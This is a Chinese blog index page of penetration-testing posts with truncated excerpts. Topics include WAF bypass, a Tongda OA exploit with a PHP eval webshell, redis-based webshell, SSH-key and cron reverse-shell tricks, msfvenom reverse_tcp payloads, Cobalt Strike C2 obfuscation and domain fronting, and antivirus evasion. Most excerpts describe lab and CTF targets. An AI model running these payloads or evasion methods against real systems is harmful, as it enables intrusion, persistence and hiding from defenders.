渗透测试
文章平均质量分 57
火中的冰~
喜欢网络安全,热爱技术的一个小帅哥。
展开
-
网站安全狗V4.0绕过姿势
网站安全狗下载地址:网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改https://www.safedog.cn/website_safedog.htmlDVWA下载:链接:https://pan.baidu.com/s/1XZXC3r_LhtY9s7xJM_NAYQ提取码:kun6--来自百度网盘超级会员V3的分享已DVWA SQL注入为例对网站安全狗进行绕过测试。1.查看安全狗防御规则匹配库。2.绕过分析 字符 ...原创 2021-09-27 14:49:11 · 4023 阅读 · 4 评论 -
通达OA11.6身份验证绕过+文件上传
环境安装11.6OA链接:https://pan.baidu.com/s/1tmqpaq5NnY3edshJExxqQg 提取码:z33a 源码解密工具链接:https://pan.baidu.com/s/1LbdVhaVInbMxQoAM4g4VKg 提取码:nrtw漏洞利用import requeststarget="http://192.168.202.151"payload="<?php @eval($_REQUEST[777])?>"p...原创 2021-08-03 13:41:18 · 1310 阅读 · 0 评论 -
vulnstack(五)
1.信息收集主机发现sudo netdiscover eth0 -r 192.168.31.0/24端口扫描nmap -A 192.168.31.57 -p- -sV -oN nmap.agoby漏扫2.漏洞利用goby 通用poc写webshellecho ^<?php @eval($_POST['123']) ?^> > #注意”>“字符需要转义type shell.php蚁剑连接webshell3.原创 2021-05-30 11:50:00 · 1301 阅读 · 5 评论 -
Vulnstack(四)
靶场拓扑下载连接:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/用的是VMware workstation 所以可能出现一些错误Docker环境启动的是Vulhub的在线三个靶机1.信息收集主机发现sudo netdiscover -i eth1 -r 192.168.157.0/24端口扫描nmap -A 192.168.53.128 -p- -oN nmap.a2.apacheput文件上传脚本..原创 2021-05-24 16:35:35 · 1111 阅读 · 3 评论 -
网站CDN 判断 绕过方法
CDN判断目标是否存在CDN服务利用多节点技术进行i请求返回判断。1.多地PING/超级PING http://ping.chinaz.com/CDN对安全测试的影响CDN绕过方式1.子域名查询通过解析网站子域名的IP地址查,查看是否存在没有经过CDN节点流量的子域名。典型的案例就是访问www.xueersi.com和xueersi.com使用多地PING来检测这个站点就会很容易发现网站真实的IP地址,在多地PING访问xueersi.com的时候看到所有返回都是相同IP原创 2021-04-10 15:47:47 · 586 阅读 · 1 评论 -
frp内网穿透
frp内网穿透frp是一种快速反向代理,可以帮助将NAT或防火墙后面得本地服务公开到Internet。目前为止,它支持UDP和TCP以及HTTP和HTTPS协议,在这些协议中,请求可以通过域名转发到内部服务,frp还具有P2P链接模式。工具下载地址:https://github.com/fatedier/frpfrp的作用利用处于内网或防火墙后的机器,对外网环境提供http或https服务。对于http,https服务支持基于域名的虚拟主机,支持自定义域名绑定,使多个域名公用一个80端口。利原创 2021-03-26 16:23:34 · 503 阅读 · 0 评论 -
内网渗透 SSH隧道
SSH隧道 SSH会自动加密和解密所有SSH客户端与服务端之间的网络数据。但是,SSH还能够将其他TCP端口的网络数据通过SSH链接来转发,并且自动提供了响应的解密服务。这一过程也被叫做“隧道”(tunneling),这是因为SSH为其他TCP链接提供了一个安全的通道来进行传输而得名,例如SMTP、LDAP这些TCP应用均能够从中得益,避免了用户名,密码以及隐私信息的传输。而此同时,如果工作环境中的防火墙限制了一些网络端口的使用,但是允许SSH的连接,也能够通过将TCP端口转发来使用SSH进行通讯..原创 2021-03-24 18:38:58 · 714 阅读 · 0 评论 -
内网穿透Neo-reGeorg
内网穿透Neo-reGeorgreGeorg是一个基于http协议的内网穿透神器,也就是我们在获得服务器的webshell后可以通过上传生成好的key.txt来建立sock5连接,通过sock5连接更好的对内网进行横向渗透。github项目地址,https://github.com/L-codes/Neo-reGeorg生成服务端python3 neoreg.py generate -k 123456 上传tunnel.php进行连接服务器是phpstudy搭建的.原创 2021-03-23 21:11:33 · 863 阅读 · 0 评论 -
Metasploit Portfwd(端口转发/重定向)
Metasploit Portfwd端口抓发获取meterpreter的shell后可进行端口转发操作,可以使用portfwd -h 转发入侵机器的端口。先获取目标主机的shell建立连接使用enable_rdp模块开启目标的远程连接run post/windows/manage/enable_rdpportfwd add -l 3389 -p 3389 -r 192.168.28.131rdesktop 127.0.0.1:3389...原创 2021-03-23 17:40:30 · 996 阅读 · 0 评论 -
cobalt strike正向反向连接内网
使用Cobalt strike正向连接多层内网使用Cobalt strike正向连接多层内网win10服务器以上线到cs上,利用win10作为跳板机正向连接2008web服务器生成监听器beacon-tcpweb服务器执行becone.exeinteract 进入beacon连接目标connect 10.10.1.129 7666输入命令正向连接使用Cobalt strike反向连接多层内网通过服务器方向连接teamserver,因为是服务器主动连接原创 2021-03-22 20:25:38 · 4070 阅读 · 0 评论 -
netsh端口映射与端口转发
1.netsh端口映射netsh是windows系统自带的一个命令行工具,这个工具可以内置端口转发功能实验场景web服务器的80端口转发到win10的7777端口上,kali通过访问win10的7777端口进行访问没问你web服务器。netsh interface portproxy add v4tov4 listenport=win10设置的端口 connectaddress= web服务 器(ip) connectport=端口netsh interface portp原创 2021-03-22 15:51:39 · 919 阅读 · 4 评论 -
cobalt strike生成证书修改C2 profile流量加密混淆
C2 profile流量加密混淆生成证书修改C2 profile加密混淆实际上就是对流量加密传输,目的是为了逃逸安全审计,穿透检测器。生成免费的ssl证书在运行cobalt strike 默认使用的cobaltstrike store证书,生成新证书的意义是将使用我们现在的制定好的证书。默认的证书cobalt strike会被检测。keytool -genkey -alias wkk -keyalg RSA -validity 36500 -keystore wkk.storewk原创 2021-03-15 18:35:47 · 4037 阅读 · 0 评论 -
域前置技术
域前置(Domain Fronting)基于HTTPS通用规避技术,也被称为域前端网络攻击,这是一种用来隐藏Metasploit,Cobalt Strike 等团队控制服务器流量以此来一定程度绕过检查器或防火墙检测的技术,如 Amazon ,Google,Akamai 等大型厂商会提供一些域前端技术服务。域前置技术原理通过CDN节点将流量转发到真实的C2服务器,其中CDN节点ip通过识别请求的Host头进行流量转发。利用我们配置域名的高可信度,我们可以设置一个微软或者谷歌的子域名,可以有效的..原创 2021-03-15 16:35:26 · 5701 阅读 · 0 评论 -
MSF流量加密躲避检测
为了防止主机被入侵,现在大部分的内网环境都装有流量审计工具,专门用来分析流量特征,分析网络流量特征,分析网络流量,如后门特征,行为特征、像metasploit在内网做横向渗透时。这些流量很容易就被检测出来,所以做好流量加密,就能避免审计工具检测出来。...原创 2021-03-15 12:03:06 · 1269 阅读 · 0 评论 -
Openssl反弹加密shell
使用Openssl反弹加密shell进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。...原创 2021-03-14 22:02:19 · 927 阅读 · 0 评论 -
域渗透综合项目实战
1.项目网络拓扑2.信息收集netdiscover主机发现sudo netdiscover -i eth0 -r 192.168.3.0/24Nmap端口扫描nmap -A 192.168.3.45 -p- -oN nmap.a原创 2021-02-27 00:57:25 · 5443 阅读 · 4 评论 -
linux提权辅助脚本整合
1. LinEnum的使用这个脚本是用来收集系统的信息,如:特殊文件的权限、suid文件信息、网络端口信息。sudo python -m SimpleHTTPServer 80下载文件执行 wget http://192.168.0.109/LinEnum.sh历史记录找到 root 密码yanisy1232. linux-exploit-suggester的使用这个用来检测是否存在提权cve漏洞下载文件执行 wget https://raw.githubuserco.原创 2021-02-20 23:41:13 · 2253 阅读 · 0 评论 -
综合渗透测试实战项目
1.项目网络拓扑1.信息收集netdiscover进行主机发现sudo netdiscover -i eth0 -r 192.168.3.0/24端口服务探测这里使用两款工具一款是nmapnmap -A 192.168.3.134 -p- -oN nmap.akali@ToolsScannerKali20201:~/Desktop$ nmap -A 192.168.3.134 -p- -oN nmap.aStarting Nmap 7.80 ( https://n原创 2021-02-07 20:06:51 · 7554 阅读 · 1 评论 -
redis写webshell
利用redis写webshellkali@ToolsScannerKali20201:~$ redis-cli -h 192.168.3.28192.168.3.28:6379> config set dir /usr/local/nginx/htmlOK192.168.3.28:6379> config set dbfilename shell.phpOK192.168.3.28:6379> set x "<?php @eval($_REQUEST[123])?&g原创 2021-01-31 19:30:05 · 805 阅读 · 0 评论 -
redis 密钥登陆ssh
redis密钥登陆ssh1.生成密钥ssh-keygen -t rsa2.防止乱码导入到key文件中(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txtcat key.txt | redis-cli -h 192.168.3.26 --pass 123456 -x set xxx--pass是登录密码 无密码可不填redis-cli -h 192.168.3.26 config set dir /ro原创 2021-01-31 14:50:03 · 1774 阅读 · 0 评论 -
redis计划任务反弹shell
1.环境搭建Ubuntu16.04安装redissudo apt-get install redis-servervim /etc/redis/redis.conf注释掉密码和仅允许本地访问kali 安装redis-cli进行连接wget http://download.redis.io/redis-stable.tar.gztar -zxvf redis-stable.tar.gzcd redis-stable make //全局生效 cp src/redis原创 2021-01-31 12:35:36 · 3052 阅读 · 0 评论 -
解决反弹shell方向键编码错误问题(小技巧)
1.接收一个反弹shell并设置为交互式shellnc -lvnp 7777python -c "import pty;pty.spawn('/bin/bash')"2.更改编码格式为rwa先ctrl+z暂停进程输入命令ctrl + z 暂停进程stty -echo raw 改编码格式fg 切换回原来进程...原创 2021-01-29 23:06:02 · 942 阅读 · 0 评论 -
Weblogic SSRF 到Getshell
Weblogic SSRF漏洞描述:Weblogic中存在SSRF漏洞,利用该漏洞可以任意HTTP请求,进而攻击内网redis/fastcgi等脆弱组件。1.环境搭建环境采用vulhub的docker环境启动环境路径vulhub/weblogic/ssrf启动环境命令docker-compose builddocker-compose up -d访问http://your-ip:7001/uddiexplorer/ 无需登录即可查看uddiexploer应用2.S..原创 2021-01-29 22:53:25 · 648 阅读 · 0 评论 -
入侵靶机DC-9
1.主机发现Nmap -sP 192.168.43.0/24C:\Users\ASUS>Nmap -sP 192.168.43.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:53 ?D1ú±ê×?ê±??Nmap scan report for 192.168.43.79Host is up (0.0010s latency).MAC Address: 00:0C:29:B7:B6:AD (VMware).原创 2020-11-11 22:16:09 · 546 阅读 · 0 评论 -
靶机【Vulnhub】FourAndSix2
FourAndSix21.主机发现靶机给出了网卡ip和网关还是Nmap ping扫一下C:\Users\ASUS>Nmap -sP 192.168.43.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-19 10:48 ?D1ú±ê×?ê±??Nmap scan report for 192.168.43.1Host is up (0.0070s latency).MAC Address: EC:D0:9F原创 2020-10-19 22:39:59 · 610 阅读 · 0 评论 -
drupla SQL手工注入复习
判断列数?nid=1 order by 1 --+` ?nid=1 order by 1 --+ 错误程序中SQL语句有两列判断显示位?nid=0 union select 1`数据库名字?nid=0 union select database()数据库版本?nid=0 union select version()列表名?nid=0 union select table_name from information_schema.原创 2020-10-15 20:33:38 · 184 阅读 · 0 评论 -
入侵靶机DC-8
DC-81.主机发现使用Nmap进行ping扫描,根据已知mac地址获取ip地址。Nmap -sP 192.168.43.0/24Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 ?D1ú±ê×?ê±??Nmap scan report for 192.168.43.1Host is up (0.0049s latency).MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communi原创 2020-10-15 20:20:56 · 2076 阅读 · 0 评论 -
Payload分离免杀绕过杀软
Payload分离免杀绕过杀软杀毒软件的原理是根据特征、行为、基于云查杀,云查杀主要是根据特征码进行查杀,每一种杀毒软件都会检测头文件,所以可以进行程序段代码分离的形式,绕过当前主流杀软。1.C语言编译后门root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -a x86 --platform Windows \> -p windows/meterpreter/reverse_tcp \> -b '\x00\x0b' LHOST=123.56.138原创 2020-10-14 22:14:20 · 3088 阅读 · 12 评论 -
MSF生成后门汇总
可执行脚本反弹shell1.windows下exe执行文件后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe监听设置:msfconsoleuse exploit/mul...原创 2020-10-10 21:28:08 · 4852 阅读 · 3 评论 -
Vulnhub 靶机 Billu_b0x
1.主机发现ping扫描Nmap -sP 192.168.43.0/24端口扫描Nmap 192.168.43.217 -A -p- -oN nmap.AC:\Users\ASUS>Nmap 192.168.43.217 -A -p- -oN nmap.AStarting Nmap 7.70 ( https://nmap.org ) at 2020-10-09 14:29 ?D1ú±ê×?ê±??Nmap scan report for indishell (192.原创 2020-10-10 11:49:02 · 958 阅读 · 0 评论 -
入侵靶机DC-7
DC-71.主机发现靶机开机后DHCP获取有ip地址2.信息收集端口扫描C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.AStarting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±??Nmap scan report for dc-7 (192.168.43.111)Host is up (0.00030s latency).Not s原创 2020-10-08 21:52:17 · 1477 阅读 · 0 评论 -
入侵靶机DC-6
DC-61.主机发现2.端口扫描C:\Users\ASUS>Nmap 192.168.43.182 -A -p- -oN nmap.AStarting Nmap 7.70 ( https://nmap.org ) at 2020-10-05 10:16 ?D1ú±ê×?ê±??Nmap scan report for dc-6 (192.168.43.182)Host is up (0.00022s latency).Not shown: 65533 closed p原创 2020-10-05 21:40:03 · 1392 阅读 · 0 评论 -
入侵靶机DC-5
1.主机扫描通过已知MAC地址,确定DC-5的ip。2.端口扫描确定靶机开放端口3.访问web界面提交表单发现时间在变化直接访问thankyou.php文件这里可能存在文件包含4.web目录扫描...原创 2020-10-04 19:16:49 · 404 阅读 · 0 评论 -
靶机【B2R】Dina-1-0-1
【B2R】Dina-1-0-11.信息收集根据靶机MAC地址获取IP。Nmap -sP 192.168.43.0/24Nmap 192.168.43.91 -A -p- -oN nmap.A2.网页信息收集访问站点御剑扫描敏感目录敏感目录http://192.168.43.91/nothing/后台备份文件解压文件尝试使用之前留给的密码freedom使用文本打开文件访问http://192.168.43.原创 2020-09-27 12:35:09 · 506 阅读 · 1 评论 -
靶机【B2R】Bob:1.0.1
Bob:1.0.1下载链接https://download.vulnhub.com/bob/Bob_v1.0.1.ova将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。1.信息收集根据已知靶机mac地址查询ip。确定目标IPNmap -sP 192.168.43.0/24端口扫描Nmap 192.168.43.169 -A -p- -oN namp.AC:\Users\ASUS>Nmap 192.168.43.169 -A -p-原创 2020-09-26 11:42:47 · 1209 阅读 · 0 评论 -
phpstudy 8版本最新解析漏洞复现分析
简介影响版本 phptsuy8.1.07的Nginx1.5.11版本漏洞复现环境phpstudy 版本 8.0.1MySQ L5.7.26Nginx 1.15.11PHP 7.3.43.一句话写入图片进行上传<?php@eval($_GET['123456']);?>4.访问图片木马5.解析文件http://192.168.137.1/uploadfiles/shell.png/.php?123456=phpinfo();原创 2020-09-03 22:22:10 · 1482 阅读 · 0 评论 -
CVE-2020-0796 WIN10 永恒之黑漏洞复现
1.禁用windows update2.关闭windows防火墙3.主机发现Vulnerable 代表易攻击 也可以把ip改为 10.3.139.0/24扫描网段4.用msfvenom生成python类型的shellcode5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的6.MSF监听4444端口use exploit/multi/handler set payload windows/x64...原创 2020-08-14 17:31:46 · 1656 阅读 · 2 评论 -
CVE-2020-1938 Aapache Tomcat AJP 文件包含漏洞复现
启动vulhub环境cd /vulhub-master/tomcat/CVE-2020-1938/docker-compose up -dvulhub安装、环境配置环境启动后,访问http://your-ip:8080一、漏洞描述 Tomcat是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录...原创 2020-08-14 19:51:45 · 578 阅读 · 0 评论 -
DVWA通关 File Inclusion
文件包含漏洞 File Inclusion程序开发⼈员通常会把可重复使⽤函数写到单个⽂件中,在使⽤某个函数的时候,直接调⽤此⽂件,⽆需再次编写,这种调⽤⽂件的过程通常称为包含。 程序开发⼈员都希望代码更加灵活,所以会把被包含的⽂件的路径设置为变量,来进⾏动态调⽤,但是正是由于这种灵活性,如果被包含⽂件的路径客户端可控,造成⽂件包含漏洞。 ⼏乎所有的脚步都会提供⽂件包含的功能,⽂件包含漏洞在PHP 的Web 应⽤中居多,在JSP/ASP/ASP.NET 程序中⽐较少。文件包含的原理配置文件开启文原创 2020-08-06 19:48:09 · 229 阅读 · 0 评论 -
MetInfo4.0 任意用户密码修改漏洞
0x04 密码找回安全验证码客户端回显测试 找回密码测试中要注意验证码是否会回显在响应中,有些⽹站程序会选择将验证码回显在响应中,来判 断⽤户输⼊的验证码是否和响应中的验证码⼀致,如果⼀致就会通过校验。验证码暴⼒破解 找回密码功能模块中通常会将⽤户凭证(⼀般为验证码)发送到⽤户⾃⼰才可以看到的⼿机号或者邮箱 中,只要⽤户不泄露⾃⼰的验证码就不会被攻击者利⽤,但是有些应⽤程序在验证码发送功能模块中验 证码位数及复杂性较弱,也没有对验证码做次数限制...原创 2020-08-06 19:28:59 · 910 阅读 · 1 评论